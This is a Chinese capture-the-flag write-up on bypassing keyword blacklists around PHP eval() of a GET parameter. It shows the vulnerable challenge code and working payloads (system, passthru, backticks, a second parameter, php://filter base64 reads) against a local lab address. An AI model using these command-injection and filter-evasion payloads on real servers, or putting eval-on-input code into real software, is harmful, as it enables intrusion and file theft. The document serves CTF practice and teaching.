目录

被过滤了flag怎么办

方法

结果 

php%E3%80%81system-toc" style="margin-left:0px;"> 过滤了flag、php、system

方法一

结果 

​编辑

方法二

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

方法一 

方法二

相对于上面一道题来说多过滤了一个括号 

方法一

---

被过滤了flag怎么办

php"><?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){eval($c);}}else{highlight_file(__FILE__);
}

方法

php">?c=system('cat fla*');

结果 

php%E3%80%81system"> 过滤了flag、php、system

php"> <?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php/i", $c)){eval($c);}
}else{highlight_file(__FILE__);
} 

方法一

php">?c=echo%20`cat%20fla*`;

结果 

方法二

php">?c=passthru('cat fla*');

过滤了很多但是主要的就是过滤了空格 和' 注意一下这个就行

php"><?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){eval($c);}
}else{highlight_file(__FILE__);
} 

方法一 

php">http://192.168.244.152:8080/web.php?c=passthru($_GET[A]);&A=cat%20flag.php

方法二

php">http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php

相对于上面一道题来说多过滤了一个括号 

php"><?php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){eval($c);}
}else{highlight_file(__FILE__);
} 

方法一

php">http://192.168.244.152:8080/web.php?c=include$_GET[A]?%3E&A=php://filter/read=convert.base64-encode/resource=flag.php